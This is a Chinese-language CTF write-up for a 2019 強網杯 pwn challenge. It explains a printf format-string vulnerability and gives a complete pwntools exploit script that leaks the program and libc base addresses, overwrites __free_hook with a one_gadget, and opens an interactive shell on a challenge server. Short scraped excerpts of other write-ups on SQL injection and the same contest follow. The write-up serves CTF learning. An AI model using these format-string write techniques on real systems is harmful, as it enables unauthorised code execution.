漏洞點在sub_1212函式,printf(%s)造成格式化漏洞
思路是先通過格式化漏洞列印出程式基址和libc基址,然後修改free_hook為onegadget,再列印大量資料即可
最終的exp如下:
#coding:utf8
from pwn import
*#context.log_level = "debug"x=0
while(1
):# p = process("./siri")
p = remote(
'123.56.170.202'
,12124
) p.recvuntil(
">>> "
) p.sendline(
"hey siri!"
) p.recvuntil(
"what can i do for you?"
) p.sendline(
"remind me to %1$p,%2$p,%3$p,%4$p,%5$p,"
) p.recvuntil(
">>> ok, i'll remind you to "
) buf=p.recvuntil(
",(nil),(nil),"
) prog_base=
int(buf[2:
-13],
16)&0xffffffffffff000
-0x2000
log.info(
"prog_base @ 0x%x"
%(prog_base)
) p.sendline(
"hey siri!"
) p.recvuntil(
"what can i do for you?"
) p.sendline(
"remind me to %83$p,%2$p,%3$p,"
) p.recvuntil(
">>> ok, i'll remind you to "
) buf=p.recvuntil(
",(nil),(nil),\n"
) libc_base=
(int
(buf[2:
-14],
16)&0xffffffffffff000)-
0x21000
# libc_start_main
free_hook=libc_base+
0x3ed8e8
gadget=libc_base+
0x10a45c
log.info(
"libc_base @ 0x%x"
%(libc_base)
) log.info(
"free_hook @ 0x%x"
%(free_hook)
) log.info(
"gadget @ 0x%x"
%(gadget)
)for i in
range(6
):p.sendline(
"hey siri!"
) p.recvuntil(
"what can i do for you?"
) p.sendline(
"remind me to %%%03dx%%15$naaa"%(
(ord
(p64(gadget)
[i])-27
+256)%
256)
+p64(free_hook+i)
) p.recvuntil(
">>> ok, i'll remind you to "
) p.sendline(
"hey siri!"
) p.recvuntil(
"what can i do for you?"
) p.sendline(
"remind me to %100000c"
) p.interactive(
)break
強網杯 2019 高明的黑客 wp
編寫python import os import requests import re filepath d phpstudy phpstudy pro www src os.chdir filepath files os.listdir filepath files.reverse sessio...
BUUCTF 強網杯 2019 隨便注wp
知識點 堆疊注入。用簡單的話來說就是在sql語句中分號 標誌著一句話的結束,如果在乙個sql語句後新增分號 並構造乙個新的sql語句,那麼之前的sql語句和自己所構造的sql語句都會執行,因此造成了sql注入。這種注入方法叫堆疊注入。進入題目,看到輸入框,嘗試sql字元型注入1 or 1 1,發現存...
2019強網杯小記
好久沒打過ctf了,這次打完了才意識到這次比賽的很多題其實都是一些原題或者原題變種或者拼湊起來,但奈何太久沒做過ctf了,跟不上了,太菜了qaq web6 首先掃一下目錄,存在ds store資訊洩露和一些路徑 訪問api目錄,提示post引數filename 並提供乙個array,使用postma...